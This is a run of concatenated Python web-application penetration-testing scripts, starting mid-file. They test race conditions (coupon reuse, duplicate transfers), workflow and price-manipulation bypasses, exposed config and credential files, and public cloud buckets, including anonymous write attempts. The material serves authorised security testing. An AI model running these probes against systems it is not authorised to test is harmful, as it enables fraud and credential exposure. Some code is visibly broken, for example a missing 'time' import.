print(f"[*] Testing coupon code race: {coupon_code}")
responses = await self.send_concurrent_requests(
request_template,
concurrency=concurrency,
total_requests=concurrency * 2
)
# Analyze responses
success_count = 0
error_count = 0
for resp in responses:
if isinstance(resp, dict):
if resp.get('status') == 200:
success_count += 1
else:
error_count += 1
result = {
'test': 'coupon_race',
'coupon_code': coupon_code,
'concurrency': concurrency,
'success_count': success_count,
'error_count': error_count,
'vulnerable': success_count > 1 # Coupon used more than once
}
self.results.append(result)
return result
async def test_balance_transfer_race(self, from_account, to_account, amount, concurrency=15):
"""Test for balance transfer race condition"""
request_template = {
'method': 'POST',
'url': f'{self.target_url}/api/transfer',
'headers': {'Content-Type': 'application/json'},
'json': {
'from_account': from_account,
'to_account': to_account,
'amount': amount,
'reference': 'REF_UNIQUE'
}
}
print(f"[*] Testing balance transfer race: {amount} from {from_account}")
responses = await self.send_concurrent_requests(
request_template,
concurrency=concurrency,
total_requests=concurrency
)
# Check for duplicate transfers
successful_transfers = []
for resp in responses:
if isinstance(resp, dict) and resp.get('status') == 200:
# Extract transfer ID from response
try:
import json
data = json.loads(resp.get('text', '{}'))
if 'transfer_id' in data:
successful_transfers.append(data['transfer_id'])
except:
successful_transfers.append('unknown')
result = {
'test': 'balance_transfer_race',
'from_account': from_account,
'to_account': to_account,
'amount': amount,
'concurrency': concurrency,
'successful_transfers': len(successful_transfers),
'unique_transfers': len(set(successful_transfers)),
'vulnerable': len(successful_transfers) > 1 and len(set(successful_transfers)) > 1
}
self.results.append(result)
return result
async def test_inventory_race(self, product_id, quantity=1, concurrency=25):
"""Test for inventory race condition (TOCTOU)"""
request_template = {
'method': 'POST',
'url': f'{self.target_url}/api/purchase',
'headers': {'Content-Type': 'application/json'},
'json': {
'product_id': product_id,
'quantity': quantity,
'customer_id': 'CUST_UNIQUE'
}
}
print(f"[*] Testing inventory race for product: {product_id}")
responses = await self.send_concurrent_requests(
request_template,
concurrency=concurrency,
total_requests=concurrency * 2
)
# Analyze inventory oversell
successful_purchases = []
for resp in responses:
if isinstance(resp, dict) and resp.get('status') == 200:
successful_purchases.append(1)
result = {
'test': 'inventory_race',
'product_id': product_id,
'quantity': quantity,
'concurrency': concurrency,
'successful_purchases': len(successful_purchases),
'vulnerable': len(successful_purchases) > 10 # Arbitrary threshold
}
self.results.append(result)
return result
async def test_rate_limit_bypass(self, endpoint, concurrency=50):
"""Test for rate limit bypass via race condition"""
request_template = {
'method': 'POST',
'url': f'{self.target_url}{endpoint}',
'headers': {'Content-Type': 'application/json'},
'json': {'action': 'test_UNIQUE'}
}
print(f"[*] Testing rate limit bypass: {endpoint}")
# First, determine normal rate limit
baseline_responses = await self.send_concurrent_requests(
request_template,
concurrency=1,
total_requests=5
)
# Then test with high concurrency
attack_responses = await self.send_concurrent_requests(
request_template,
concurrency=concurrency,
total_requests=concurrency
)
# Count successful responses
baseline_success = sum(1 for r in baseline_responses
if isinstance(r, dict) and r.get('status') == 200)
attack_success = sum(1 for r in attack_responses
if isinstance(r, dict) and r.get('status') == 200)
result = {
'test': 'rate_limit_bypass',
'endpoint': endpoint,
'concurrency': concurrency,
'baseline_success': baseline_success,
'attack_success': attack_success,
'vulnerable': attack_success > baseline_success * 2
}
self.results.append(result)
return result
async def run_all_tests(self):
"""Run all race condition tests"""
tests = [
self.test_coupon_race("WELCOME2024", 20),
self.test_balance_transfer_race("ACC123", "ACC456", 100, 15),
self.test_inventory_race("PROD789", 1, 25),
self.test_rate_limit_bypass("/api/reset-password", 50)
]
results = await asyncio.gather(*tests)
# Generate report
report = {
'summary': {
'total_tests': len(results),
'vulnerable_tests': sum(1 for r in results if r.get('vulnerable')),
'tests_run': [r.get('test') for r in results]
},
'detailed_results': results
}
return report
# Usage
async def main():
tester = RaceConditionTester(
"http://target.com",
session_cookies={"SESSION": "your_session_id"}
)
report = await tester.run_all_tests()
print("\n" + "="*60)
print("RACE CONDITION TEST REPORT")
print("="*60)
for result in report['detailed_results']:
status = "VULNERABLE" if result.get('vulnerable') else "SAFE"
print(f"\n[{status}] {result['test']}")
print(f" Details: {result}")
# Run the test
import asyncio
asyncio.run(main())#!/usr/bin/env python3
"""
Workflow Bypass and State Transition Testing
Tests for skipped steps, unauthorized state changes, and business logic flaws
"""
import requests
import json
from urllib.parse import urljoin
class WorkflowBypassTester:
def __init__(self, base_url, auth_token=None):
self.base_url = base_url
self.session = requests.Session()
if auth_token:
self.session.headers.update({'Authorization': f'Bearer {auth_token}'})
# Common workflow patterns to test
self.workflow_patterns = {
'checkout': ['cart', 'shipping', 'payment', 'confirmation'],
'registration': ['start', 'verify_email', 'set_password', 'complete'],
'password_reset': ['request', 'verify_token', 'set_new', 'complete'],
'kyc': ['personal_info', 'document_upload', 'verification', 'approved']
}
def test_step_skipping(self, workflow_type, steps):
"""Test if workflow steps can be skipped"""
vulnerabilities = []
# Create a map of step endpoints
step_endpoints = self.discover_workflow_endpoints(workflow_type)
if not step_endpoints:
print(f"[-] Could not discover endpoints for {workflow_type}")
return vulnerabilities
# Test skipping from first to last step
if len(step_endpoints) >= 3:
first_step = step_endpoints[0]
last_step = step_endpoints[-1]
print(f"[*] Testing step skipping: {first_step} -> {last_step}")
# Try to access last step without completing first
response = self.session.get(urljoin(self.base_url, last_step))
if response.status_code == 200:
# Check if it actually worked (not just showing error page)
if not self.is_error_page(response.text):
vulnerabilities.append({
'type': 'step_skipping',
'workflow': workflow_type,
'from_step': first_step,
'to_step': last_step,
'status_code': response.status_code,
'evidence': response.text[:200]
})
# Test skipping intermediate steps
for i in range(len(step_endpoints) - 2):
for j in range(i + 2, len(step_endpoints)):
step_a = step_endpoints[i]
step_b = step_endpoints[j]
# Complete step A
self.complete_step(step_a)
# Try to access step B directly
response = self.session.get(urljoin(self.base_url, step_b))
if response.status_code == 200 and not self.is_error_page(response.text):
vulnerabilities.append({
'type': 'intermediate_step_skip',
'workflow': workflow_type,
'skipped_steps': step_endpoints[i+1:j],
'status_code': response.status_code
})
return vulnerabilities
def test_state_manipulation(self, workflow_type):
"""Test if workflow state can be manipulated"""
vulnerabilities = []
# Discover state parameters
state_params = self.discover_state_parameters(workflow_type)
for param, values in state_params.items():
# Try to set unauthorized states
for target_state in ['approved', 'completed', 'verified', 'paid']:
if target_state not in values: # Not a normal state
# Try to set this state
payload = {param: target_state}
response = self.session.post(
urljoin(self.base_url, f'/api/{workflow_type}/update'),
json=payload
)
if response.status_code == 200:
# Verify state was actually changed
check_response = self.session.get(
urljoin(self.base_url, f'/api/{workflow_type}/status')
)
if target_state in check_response.text:
vulnerabilities.append({
'type': 'state_manipulation',
'workflow': workflow_type,
'parameter': param,
'unauthorized_state': target_state,
'evidence': check_response.text[:200]
})
return vulnerabilities
def test_parallel_workflows(self):
"""Test for parallel workflow execution issues"""
vulnerabilities = []
workflows = ['checkout', 'kyc', 'registration']
for workflow in workflows:
# Start two instances of the same workflow
instance1_id = self.start_workflow(workflow)
instance2_id = self.start_workflow(workflow)
if instance1_id and instance2_id:
# Try to mix data between workflows
mix_payload = {
'workflow_id': instance1_id,
'data': {'from_instance': instance2_id}
}
response = self.session.post(
urljoin(self.base_url, f'/api/{workflow}/update'),
json=mix_payload
)
if response.status_code == 200:
vulnerabilities.append({
'type': 'parallel_workflow_mixing',
'workflow': workflow,
'instance1': instance1_id,
'instance2': instance2_id,
'evidence': response.text[:200]
})
return vulnerabilities
def test_business_constraint_bypass(self):
"""Test for business constraint bypasses"""
vulnerabilities = []
# Test 1: Negative quantities
test_cases = [
{'item': 'PROD001', 'quantity': -1, 'expected': 'error'},
{'item': 'PROD001', 'quantity': 0, 'expected': 'error'},
{'item': 'PROD001', 'quantity': 999999, 'expected': 'error'}, # Too large
{'item': 'PROD001', 'quantity': 1.5, 'expected': 'error'}, # Fractional
]
for test in test_cases:
response = self.session.post(
urljoin(self.base_url, '/api/cart/add'),
json=test
)
if response.status_code == 200 and test['expected'] == 'error':
vulnerabilities.append({
'type': 'quantity_constraint_bypass',
'test_case': test,
'status_code': response.status_code,
'response': response.text[:200]
})
# Test 2: Price manipulation
price_tests = [
{'item': 'PROD001', 'price': 0.01}, # Lower than actual
{'item': 'PROD001', 'price': -10}, # Negative price
{'item': 'PROD001', 'price': 1e10}, # Very high price
]
for test in price_tests:
response = self.session.post(
urljoin(self.base_url, '/api/checkout'),
json=test
)
if response.status_code == 200:
# Check if order was created with manipulated price
order_response = self.session.get(
urljoin(self.base_url, '/api/orders/latest')
)
if str(test['price']) in order_response.text:
vulnerabilities.append({
'type': 'price_manipulation',
'test_case': test,
'order_details': order_response.text[:200]
})
# Test 3: Discount stacking
discount_tests = [
{'coupons': ['SAVE10', 'SAVE20', 'SAVE30']}, # Multiple coupons
{'coupons': ['SAVE10'] * 5}, # Same coupon multiple times
]
for test in discount_tests:
for coupon in test['coupons']:
self.session.post(
urljoin(self.base_url, '/api/apply-coupon'),
json={'coupon': coupon}
)
# Check final price
response = self.session.get(
urljoin(self.base_url, '/api/cart/total')
)
try:
total = json.loads(response.text).get('total', 0)
if total < 0: # Negative total
vulnerabilities.append({
'type': 'discount_stacking',
'coupons': test['coupons'],
'final_total': total
})
except:
pass
return vulnerabilities
def discover_workflow_endpoints(self, workflow_type):
"""Discover endpoints for a given workflow"""
endpoints = []
# Common endpoint patterns
patterns = [
f'/api/{workflow_type}/{{step}}',
f'/{workflow_type}/{{step}}',
f'/app/{workflow_type}/{{step}}',
]
# Common step names
step_names = ['start', 'create', 'step1', 'step2', 'step3',
'review', 'confirm', 'complete', 'finish']
for pattern in patterns:
for step in step_names:
endpoint = pattern.format(step=step)
response = self.session.head(urljoin(self.base_url, endpoint))
if response.status_code != 404:
endpoints.append(endpoint)
return sorted(set(endpoints))
def is_error_page(self, html):
"""Check if page is an error page"""
error_indicators = [
'error', 'invalid', 'not found', '404', '403',
'forbidden', 'unauthorized', 'access denied'
]
html_lower = html.lower()
return any(indicator in html_lower for indicator in error_indicators)
# Usage
tester = WorkflowBypassTester(
"http://target.com",
auth_token="your_auth_token"
)
# Run tests
step_skip_vulns = tester.test_step_skipping('checkout', [])
state_vulns = tester.test_state_manipulation('kyc')
parallel_vulns = tester.test_parallel_workflows()
constraint_vulns = tester.test_business_constraint_bypass()
all_vulns = step_skip_vulns + state_vulns + parallel_vulns + constraint_vulns
print(f"\n[+] Found {len(all_vulns)} workflow bypass vulnerabilities:")
for vuln in all_vulns:
print(f" - {vuln['type']}: {vuln.get('evidence', 'No details')[:100]}")#!/usr/bin/env python3
"""
Advanced Security Misconfiguration Scanner
Covers web servers, application frameworks, cloud services, and containers
"""
import requests
import yaml
import json
import socket
import ssl
from typing import Dict, List
import concurrent.futures
class SecurityMisconfigScanner:
def __init__(self, target_url):
self.target_url = target_url
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'SecurityScanner/1.0'
})
self.findings = []
def scan_web_server(self):
"""Scan web server configurations"""
server_findings = []
# 1. Check HTTP methods
methods = ['GET', 'POST', 'PUT', 'DELETE', 'PATCH', 'OPTIONS', 'TRACE', 'CONNECT']
for method in methods:
try:
response = self.session.request(method, self.target_url, timeout=5)
if response.status_code not in [405, 501]: # Method not allowed/implemented
server_findings.append({
'category': 'HTTP Methods',
'issue': f'Potentially dangerous method {method} enabled',
'severity': 'MEDIUM',
'evidence': f'HTTP {method} returns {response.status_code}'
})
except:
pass
# 2. Check HTTP headers
response = self.session.get(self.target_url)
headers = response.headers
# Security headers check
security_headers = {
'Strict-Transport-Security': 'HIGH',
'Content-Security-Policy': 'MEDIUM',
'X-Frame-Options': 'MEDIUM',
'X-Content-Type-Options': 'LOW',
'Referrer-Policy': 'LOW',
'Permissions-Policy': 'MEDIUM'
}
for header, severity in security_headers.items():
if header not in headers:
server_findings.append({
'category': 'Security Headers',
'issue': f'Missing security header: {header}',
'severity': severity,
'evidence': 'Header not present in response'
})
# 3. Check for server information leakage
server_header = headers.get('Server', '')
x_powered_by = headers.get('X-Powered-By', '')
if server_header:
server_findings.append({
'category': 'Information Disclosure',
'issue': f'Server version disclosed: {server_header}',
'severity': 'LOW',
'evidence': f'Server: {server_header}'
})
if x_powered_by:
server_findings.append({
'category': 'Information Disclosure',
'issue': f'Technology stack disclosed: {x_powered_by}',
'severity': 'LOW',
'evidence': f'X-Powered-By: {x_powered_by}'
})
# 4. Check for directory listing
test_dirs = ['/static/', '/uploads/', '/images/', '/files/', '/assets/']
for directory in test_dirs:
test_url = self.target_url.rstrip('/') + directory
try:
response = self.session.get(test_url, timeout=5)
if '<title>Index of' in response.text or '<h1>Index of' in response.text:
server_findings.append({
'category': 'Directory Listing',
'issue': f'Directory listing enabled at {directory}',
'severity': 'MEDIUM',
'evidence': f'Directory index page accessible at {test_url}'
})
except:
pass
return server_findings
def scan_framework_config(self):
"""Scan framework-specific misconfigurations"""
framework_findings = []
# Detect framework
framework = self.detect_framework()
if framework == 'django':
# Django-specific checks
test_paths = [
'/admin', # Django admin
'/admin/login',
'/static/admin',
'/debug', # Django debug toolbar
]
for path in test_paths:
test_url = self.target_url.rstrip('/') + path
response = self.session.get(test_url)
if response.status_code == 200:
if 'Django' in response.text:
if path == '/admin':
framework_findings.append({
'category': 'Django',
'issue': 'Django admin interface accessible',
'severity': 'HIGH' if 'login' not in response.text else 'MEDIUM',
'evidence': f'Admin interface at {test_url}'
})
elif 'debug' in path:
framework_findings.append({
'category': 'Django',
'issue': 'Django debug mode might be enabled',
'severity': 'HIGH',
'evidence': f'Debug interface at {test_url}'
})
elif framework == 'laravel':
# Laravel-specific checks
test_paths = [
'/.env',
'/storage/logs/laravel.log',
'/vendor/',
'/config/',
]
for path in test_paths:
test_url = self.target_url.rstrip('/') + path
response = self.session.get(test_url)
if response.status_code == 200:
if path == '/.env':
framework_findings.append({
'category': 'Laravel',
'issue': '.env file accessible',
'severity': 'CRITICAL',
'evidence': f'Environment file exposed at {test_url}'
})
elif 'vendor' in path:
framework_findings.append({
'category': 'Laravel',
'issue': 'Vendor directory accessible',
'severity': 'HIGH',
'evidence': f'Vendor directory at {test_url}'
})
elif framework == 'rails':
# Ruby on Rails checks
test_paths = [
'/rails/info/properties',
'/rails/mailers',
'/assets/',
'/system/',
]
for path in test_paths:
test_url = self.target_url.rstrip('/') + path
response = self.session.get(test_url)
if response.status_code == 200:
if 'rails' in path:
framework_findings.append({
'category': 'Rails',
'issue': 'Rails information pages accessible',
'severity': 'HIGH',
'evidence': f'Rails info at {test_url}'
})
return framework_findings
def scan_cloud_misconfig(self):
"""Scan for cloud service misconfigurations"""
cloud_findings = []
# Check for cloud metadata endpoints (from SSRF perspective)
metadata_endpoints = [
'http://169.254.169.254/latest/meta-data/',
'http://metadata.google.internal/computeMetadata/v1/',
'http://169.254.169.254/metadata/instance',
'http://100.100.100.200/latest/meta-data/', # Alibaba Cloud
]
# Check for exposed S3/GCP buckets
bucket_patterns = [
's3.amazonaws.com',
'storage.googleapis.com',
'blob.core.windows.net',
'digitaloceanspaces.com'
]
# Scan for cloud-specific files
cloud_files = [
'/.aws/credentials',
'/.config/gcloud/credentials',
'/.azure/credentials',
'/.kube/config'
]
# Check response for cloud indicators
response = self.session.get(self.target_url)
html = response.text
for pattern in bucket_patterns:
if pattern in html:
cloud_findings.append({
'category': 'Cloud Storage',
'issue': f'Cloud storage URL found: {pattern}',
'severity': 'MEDIUM',
'evidence': f'Found reference to {pattern} in page source'
})
# Check for cloud metadata in comments
import re
cloud_keys = re.findall(r'(AKIA[0-9A-Z]{16})|(gh[oprstu]_[0-9a-zA-Z]{36})', html)
if cloud_keys:
cloud_findings.append({
'category': 'Cloud Credentials',
'issue': 'Potential cloud credentials found in page source',
'severity': 'CRITICAL',
'evidence': f'Found {len(cloud_keys)} potential credential patterns'
})
return cloud_findings
def scan_container_misconfig(self):
"""Scan for container and orchestration misconfigurations"""
container_findings = []
# Kubernetes/Docker exposed endpoints
container_endpoints = [
'/docker.sock',
'/var/run/docker.sock',
'/kubelet',
'/metrics',
'/healthz',
'/readyz',
'/debug/pprof/',
'/debug/vars',
'/api/v1/namespaces',
'/apis/apps/v1/deployments',
]
for endpoint in container_endpoints:
test_url = self.target_url.rstrip('/') + endpoint
try:
response = self.session.get(test_url, timeout=5)
if response.status_code == 200:
# Check response content for container indicators
if any(indicator in response.text.lower()
for indicator in ['docker', 'kubernetes', 'k8s', 'pod', 'container']):
container_findings.append({
'category': 'Container Exposure',
'issue': f'Container/orchestration endpoint exposed: {endpoint}',
'severity': 'CRITICAL',
'evidence': f'Endpoint accessible at {test_url}'
})
except:
pass
# Check for Docker/K8s configuration files
config_files = [
'/.docker/config.json',
'/.kube/config',
'/etc/kubernetes/admin.conf',
'/var/lib/kubelet/config.yaml'
]
for config_file in config_files:
test_url = self.target_url.rstrip('/') + config_file
response = self.session.get(test_url)
if response.status_code == 200:
container_findings.append({
'category': 'Container Config',
'issue': f'Container configuration file exposed: {config_file}',
'severity': 'CRITICAL',
'evidence': f'Config file accessible at {test_url}'
})
return container_findings
def scan_application_misconfig(self):
"""Scan for application-level misconfigurations"""
app_findings = []
# 1. Check for debug modes
debug_indicators = [
('/debug', 'Debug interface'),
('/phpinfo', 'PHPInfo'),
('/actuator', 'Spring Boot Actuator'),
('/_debug', 'Debug endpoint'),
('/console', 'Debug console'),
]
for endpoint, description in debug_indicators:
test_url = self.target_url.rstrip('/') + endpoint
response = self.session.get(test_url)
if response.status_code == 200:
app_findings.append({
'category': 'Debug Mode',
'issue': f'{description} accessible',
'severity': 'HIGH',
'evidence': f'{description} at {test_url}'
})
# 2. Check for configuration files
config_files = [
('.env', 'Environment file'),
('.env.example', 'Example environment file'),
('config.xml', 'XML configuration'),
('config.json', 'JSON configuration'),
('settings.py', 'Python settings'),
('application.yml', 'YAML configuration'),
('web.config', 'ASP.NET config'),
('.htaccess', 'Apache config'),
('.git/config', 'Git config'),
]
for filename, description in config_files:
test_url = self.target_url.rstrip('/') + '/' + filename
response = self.session.get(test_url)
if response.status_code == 200:
app_findings.append({
'category': 'Config File Exposure',
'issue': f'{description} exposed',
'severity': 'MEDIUM' if 'example' in filename else 'HIGH',
'evidence': f'{description} at {test_url}'
})
# 3. Check for backup files
backup_patterns = [
'.bak', '.backup', '.old', '.orig', '.save',
'_backup', '-backup', '.temp', '.tmp', '.swp'
]
# Test common files with backup extensions
common_files = ['index', 'main', 'app', 'config', 'database', 'settings']
for base_file in common_files:
for ext in backup_patterns:
test_url = self.target_url.rstrip('/') + '/' + base_file + ext
response = self.session.get(test_url)
if response.status_code == 200:
app_findings.append({
'category': 'Backup Files',
'issue': f'Backup file exposed: {base_file}{ext}',
'severity': 'MEDIUM',
'evidence': f'Backup file at {test_url}'
})
return app_findings
def detect_framework(self):
"""Detect web application framework"""
response = self.session.get(self.target_url)
html = response.text
headers = response.headers
# Check headers
server = headers.get('Server', '').lower()
powered_by = headers.get('X-Powered-By', '').lower()
# Check HTML patterns
if 'django' in html.lower() or 'csrfmiddlewaretoken' in html:
return 'django'
elif 'laravel' in html.lower() or '/vendor/laravel/' in html:
return 'laravel'
elif 'rails' in server or 'rails' in powered_by:
return 'rails'
elif 'spring' in html.lower() or 'spring' in server:
return 'spring'
elif 'wordpress' in html.lower() or '/wp-content/' in html:
return 'wordpress'
elif 'node.js' in server or 'express' in server:
return 'node'
elif '.net' in powered_by or 'asp.net' in server:
return 'aspnet'
return 'unknown'
def run_comprehensive_scan(self):
"""Run all scans and generate report"""
print(f"[*] Starting comprehensive misconfiguration scan for {self.target_url}")
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
futures = {
executor.submit(self.scan_web_server): 'web_server',
executor.submit(self.scan_framework_config): 'framework',
executor.submit(self.scan_cloud_misconfig): 'cloud',
executor.submit(self.scan_container_misconfig): 'container',
executor.submit(self.scan_application_misconfig): 'application'
}
for future in concurrent.futures.as_completed(futures):
scan_type = futures[future]
try:
findings = future.result()
self.findings.extend(findings)
print(f"[+] {scan_type} scan completed: {len(findings)} findings")
except Exception as e:
print(f"[-] {scan_type} scan failed: {e}")
# Generate report
report = self.generate_report()
return report
def generate_report(self):
"""Generate comprehensive report"""
report = {
'target': self.target_url,
'scan_date': time.strftime('%Y-%m-%d %H:%M:%S'),
'total_findings': len(self.findings),
'findings_by_severity': {},
'detailed_findings': self.findings
}
# Count by severity
severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
for severity in severities:
count = sum(1 for f in self.findings if f['severity'] == severity)
report['findings_by_severity'][severity] = count
return report
# Usage
scanner = SecurityMisconfigScanner("http://target.com")
report = scanner.run_comprehensive_scan()
print(f"\n{'='*60}")
print(f"SECURITY MISCONFIGURATION SCAN REPORT")
print(f"{'='*60}")
print(f"Target: {report['target']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Findings: {report['total_findings']}")
print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
if count > 0:
print(f" {severity}: {count}")
# Print critical findings
critical_findings = [f for f in report['detailed_findings'] if f['severity'] == 'CRITICAL']
if critical_findings:
print(f"\nCRITICAL FINDINGS:")
for finding in critical_findings[:5]: # Show first 5
print(f" - {finding['issue']}")
print(f" Evidence: {finding['evidence'][:100]}...")#!/usr/bin/env python3
"""
Advanced Cloud Storage Misconfiguration Scanner
Covers AWS S3, Google Cloud Storage, Azure Blob Storage
"""
import boto3
from botocore.exceptions import ClientError, NoCredentialsError
import google.cloud.storage
from google.cloud import storage
from azure.storage.blob import BlobServiceClient
import requests
import re
from typing import List, Dict
import json
class CloudStorageScanner:
def __init__(self, aws_profile=None, gcp_credentials=None, azure_connection_string=None):
self.aws_profile = aws_profile
self.gcp_credentials = gcp_credentials
self.azure_connection_string = azure_connection_string
self.findings = []
def scan_aws_s3(self):
"""Scan AWS S3 buckets for misconfigurations"""
s3_findings = []
try:
if self.aws_profile:
session = boto3.Session(profile_name=self.aws_profile)
else:
session = boto3.Session()
s3 = session.client('s3')
s3_resource = session.resource('s3')
# List all buckets
response = s3.list_buckets()
buckets = response['Buckets']
print(f"[*] Found {len(buckets)} S3 buckets")
for bucket in buckets:
bucket_name = bucket['Name']
print(f"[*] Scanning bucket: {bucket_name}")
bucket_findings = []
# 1. Check bucket policy
try:
policy = s3.get_bucket_policy(Bucket=bucket_name)
bucket_findings.extend(
self.analyze_bucket_policy(policy['Policy'], bucket_name)
)
except ClientError as e:
if e.response['Error']['Code'] == 'NoSuchBucketPolicy':
bucket_findings.append({
'bucket': bucket_name,
'issue': 'No bucket policy configured',
'severity': 'MEDIUM',
'details': 'Bucket has no policy, relying on ACLs'
})
# 2. Check bucket ACL
try:
acl = s3.get_bucket_acl(Bucket=bucket_name)
bucket_findings.extend(
self.analyze_bucket_acl(acl, bucket_name)
)
except ClientError as e:
bucket_findings.append({
'bucket': bucket_name,
'issue': 'Failed to retrieve bucket ACL',
'severity': 'MEDIUM',
'details': str(e)
})
# 3. Check public access block
try:
public_access = s3.get_public_access_block(Bucket=bucket_name)
bucket_findings.extend(
self.analyze_public_access_block(public_access, bucket_name)
)
except ClientError as e:
# Public access block might not be configured
pass
# 4. Check for sensitive files
try:
paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket=bucket_name):
if 'Contents' in page:
for obj in page['Contents']:
key = obj['Key']
if self.is_sensitive_file(key):
bucket_findings.append({
'bucket': bucket_name,
'issue': 'Sensitive file found in bucket',
'severity': 'HIGH',
'details': f'File: {key}',
'url': f'https://{bucket_name}.s3.amazonaws.com/{key}'
})
except ClientError as e:
bucket_findings.append({
'bucket': bucket_name,
'issue': 'Failed to list bucket contents',
'severity': 'MEDIUM',
'details': str(e)
})
# 5. Check bucket encryption
try:
encryption = s3.get_bucket_encryption(Bucket=bucket_name)
# Encryption is enabled
except ClientError as e:
if e.response['Error']['Code'] == 'ServerSideEncryptionConfigurationNotFoundError':
bucket_findings.append({
'bucket': bucket_name,
'issue': 'Server-side encryption not enabled',
'severity': 'MEDIUM',
'details': 'Bucket does not have default encryption configured'
})
# 6. Check for static website hosting
try:
website = s3.get_bucket_website(Bucket=bucket_name)
bucket_findings.append({
'bucket': bucket_name,
'issue': 'Static website hosting enabled',
'severity': 'LOW',
'details': 'Bucket configured for static website hosting',
'url': f'http://{bucket_name}.s3-website-{session.region_name}.amazonaws.com'
})
except ClientError as e:
# Website hosting not enabled
pass
# 7. Test for public read access
public_test = self.test_public_access(bucket_name)
if public_test['is_public']:
bucket_findings.append({
'bucket': bucket_name,
'issue': 'Bucket is publicly accessible',
'severity': 'CRITICAL' if public_test['can_list'] else 'HIGH',
'details': public_test['details'],
'public_url': f'https://{bucket_name}.s3.amazonaws.com/'
})
s3_findings.extend(bucket_findings)
except NoCredentialsError:
print("[-] No AWS credentials found")
except Exception as e:
print(f"[-] AWS S3 scan error: {e}")
return s3_findings
def analyze_bucket_policy(self, policy_json, bucket_name):
"""Analyze S3 bucket policy for misconfigurations"""
findings = []
try:
policy = json.loads(policy_json)
for statement in policy.get('Statement', []):
# Check for wildcard principals
principal = statement.get('Principal', {})
if principal == '*':
findings.append({
'bucket': bucket_name,
'issue': 'Wildcard principal in bucket policy',
'severity': 'CRITICAL',
'details': 'Policy allows access from any principal',
'statement': statement
})
# Check for overly permissive actions
action = statement.get('Action', [])
if isinstance(action, str):
action = [action]
dangerous_actions = [
's3:*', 's3:Get*', 's3:Put*', 's3:Delete*',
's3:List*', '*'
]
for act in action:
if act in dangerous_actions:
findings.append({
'bucket': bucket_name,
'issue': 'Overly permissive action in bucket policy',
'severity': 'HIGH',
'details': f'Action: {act}',
'statement': statement
})
# Check resource wildcards
resource = statement.get('Resource', [])
if isinstance(resource, str):
resource = [resource]
for res in resource:
if '*' in res:
findings.append({
'bucket': bucket_name,
'issue': 'Wildcard resource in bucket policy',
'severity': 'MEDIUM',
'details': f'Resource: {res}',
'statement': statement
})
except json.JSONDecodeError:
findings.append({
'bucket': bucket_name,
'issue': 'Invalid bucket policy JSON',
'severity': 'MEDIUM',
'details': 'Bucket policy contains invalid JSON'
})
return findings
def test_public_access(self, bucket_name):
"""Test if bucket is publicly accessible"""
result = {
'is_public': False,
'can_list': False,
'can_read': False,
'can_write': False,
'details': ''
}
# Test 1: List objects (anonymous)
try:
response = requests.get(f'https://{bucket_name}.s3.amazonaws.com/', timeout=10)
if response.status_code == 200:
result['is_public'] = True
result['can_list'] = True
result['details'] += 'Bucket listing is public. '
except:
pass
# Test 2: Try to upload a file (anonymous PUT)
test_key = f'test_public_write_{int(time.time())}.txt'
test_url = f'https://{bucket_name}.s3.amazonaws.com/{test_key}'
try:
response = requests.put(
test_url,
data='test',
headers={'Content-Type': 'text/plain'},
timeout=10
)
if response.status_code == 200:
result['can_write'] = True
result['details'] += 'Bucket allows public writes. '
# Clean up test file
requests.delete(test_url, timeout=5)
except:
pass
# Test 3: Try to download a known file (if we can list)
if result['can_list']:
# Parse list to get a file
import xml.etree.ElementTree as ET
root = ET.fromstring(response.content)
for elem in root.findall('.//{http://s3.amazonaws.com/doc/2006-03-01/}Key'):
test_file = elem.text
if not test_file.endswith('/'): # Not a folder
file_url = f'https://{bucket_name}.s3.amazonaws.com/{test_file}'
file_response = requests.head(file_url, timeout=10)
if file_response.status_code == 200:
result['can_read'] = True
result['details'] += 'Bucket contains publicly readable files. '
break
return result
def scan_google_cloud_storage(self):
"""Scan Google Cloud Storage buckets"""
gcs_findings = []
try:
if self.gcp_credentials:
storage_client = storage.Client.from_service_account_json(self.gcp_credentials)
else:
storage_client = storage.Client()
buckets = list(storage_client.list_buckets())
print(f"[*] Found {len(buckets)} GCS buckets")
for bucket in buckets:
bucket_findings = []
# 1. Check IAM policy
policy = bucket.get_iam_policy()
for binding in policy.bindings:
# Check for allUsers or allAuthenticatedUsers
if 'allUsers' in binding.members:
bucket_findings.append({
'bucket': bucket.name,
'issue': 'Bucket accessible to all users (allUsers)',
'severity': 'CRITICAL',
'details': f'Role: {binding.role}, Members: {binding.members}'
})
if 'allAuthenticatedUsers' in binding.members:
bucket_findings.append({
'bucket': bucket.name,
'issue': 'Bucket accessible to all authenticated users',
'severity': 'HIGH',
'details': f'Role: {binding.role}, Members: {binding.members}'
})
# 2. Check bucket permissions (ACL)
acl = bucket.acl
for entry in acl:
if entry['entity'] in ['allUsers', 'allAuthenticatedUsers']:
bucket_findings.append({
'bucket': bucket.name,
'issue': f'Bucket ACL allows public access: {entry["entity"]}',
'severity': 'HIGH',
'details': f'Role: {entry["role"]}'
})
# 3. Check for uniform bucket-level access
if not bucket.iam_configuration.uniform_bucket_level_access:
bucket_findings.append({
'bucket': bucket.name,
'issue': 'Uniform bucket-level access disabled',
'severity': 'MEDIUM',
'details': 'Using fine-grained ACLs instead of IAM'
})
# 4. Check default object ACL
default_acl = bucket.default_object_acl
for entry in default_acl:
if entry['entity'] in ['allUsers', 'allAuthenticatedUsers']:
bucket_findings.append({
'bucket': bucket.name,
'issue': 'Default object ACL allows public access',
'severity': 'HIGH',
'details': f'Entity: {entry["entity"]}, Role: {entry["role"]}'
})
gcs_findings.extend(bucket_findings)
except Exception as e:
print(f"[-] GCS scan error: {e}")
return gcs_findings
def scan_azure_blob_storage(self):
"""Scan Azure Blob Storage containers"""
azure_findings = []
if not self.azure_connection_string:
print("[-] Azure connection string required")
return azure_findings
try:
blob_service_client = BlobServiceClient.from_connection_string(
self.azure_connection_string
)
containers = blob_service_client.list_containers()
containers_list = list(containers)
print(f"[*] Found {len(containers_list)} Azure containers")
for container in containers_list:
container_findings = []
container_name = container['name']
# Get container client
container_client = blob_service_client.get_container_client(container_name)
# Check container access policy
access_policy = container_client.get_container_access_policy()
# Check if public access is allowed
if container['public_access'] != 'None':
container_findings.append({
'container': container_name,
'issue': f'Container has public access: {container["public_access"]}',
